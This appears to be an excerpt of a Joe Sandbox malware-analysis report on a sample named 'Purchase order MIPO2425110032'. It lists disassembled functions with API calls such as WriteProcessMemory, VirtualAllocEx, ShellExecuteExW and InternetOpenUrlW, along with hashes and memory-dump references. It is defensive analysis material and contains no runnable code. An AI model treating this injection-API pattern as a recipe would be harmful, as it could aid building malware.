                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                            • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                            • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                            • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                            Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                            • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                            • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                            • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                            Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \
                                                            • API String ID: 4104443479-2967466578
                                                            • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                            • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                            • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                            • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                            Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                            • API String ID: 708495834-557222456
                                                            • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                            • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                            • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                            Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                              • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                              • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                              • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                              • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                            • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                            • String ID: @
                                                            • API String ID: 4150878124-2766056989
                                                            • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                            • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                            • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                                            Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: \$]$h
                                                            • API String ID: 4104443479-3262404753
                                                            • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                            • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                            • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                            Function 00457C53 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                            • CloseHandle.KERNEL32(?), ref: 00457E09
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                            • String ID: <$@
                                                            • API String ID: 2417854910-1426351568
                                                            • Opcode ID: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                            • Opcode Fuzzy Hash: 2f98286fc2dd11665d4ada5f863c78d92abc4f9667931209338d93a07fbf086c
                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                            Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                            • String ID:
                                                            • API String ID: 3705125965-3916222277
                                                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                            Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: 0
                                                            • API String ID: 135850232-4108050209
                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                            Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                            Function 00434B02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressFreeLoadProc
                                                            • String ID: AU3_GetPluginDetails
                                                            • API String ID: 145871493-4132174516
                                                            • Opcode ID: dcd865906ac5040e6418ceb55575901707d9396e778d7393d7920faf26aa26a4
                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                            • Opcode Fuzzy Hash: dcd865906ac5040e6418ceb55575901707d9396e778d7393d7920faf26aa26a4
                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                            Function 00450D6B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                            Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 3375834691-2298589950
                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                            Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: _memmove
                                                            • String ID: $<
                                                            • API String ID: 4104443479-428540627
                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                            Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.2047640465.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047692815.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047734077.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047746438.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047757897.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2047783947.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Purchase order MIPO2425110032.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$DiskFreeSpace
                                                            • String ID: \VH
                                                            • API String ID: 1682464887-234962358
                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                            Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2047650716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
